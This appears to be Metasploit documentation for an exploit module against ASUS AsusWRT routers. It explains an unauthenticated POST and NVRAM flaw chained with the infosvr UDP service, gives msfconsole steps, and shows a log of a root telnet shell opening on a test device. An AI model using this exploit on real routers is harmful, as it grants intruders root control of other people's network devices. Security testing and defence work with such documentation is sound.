## Description

  This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.


## Vulnerable Application

  The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.

  This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.

  This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.

  Numerous ASUS models are reportedly affected, but untested.


## Verification Steps

  1. Start `msfconsole`
  2. `use exploits/linux/http/asuswrt_lan_rce`
  3. `set RHOST [IP]`
  4. `run`
  5. You should get a *root* session


## Options

  **ASUSWRTPORT**

  AsusWRT HTTP portal port (default: `80`)


## Scenarios
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type             : Broadcom BCM53572 chip rev 1 pkg 8
processor               : 0
cpu model               : MIPS 74K V4.9
BogoMIPS                : 149.91
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : no
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available

unaligned_instructions  : 0
dcache hits             : 2147483648
dcache misses           : 0
icache hits             : 2147483648
icache misses           : 0
instructions            : 2147483648
/ #
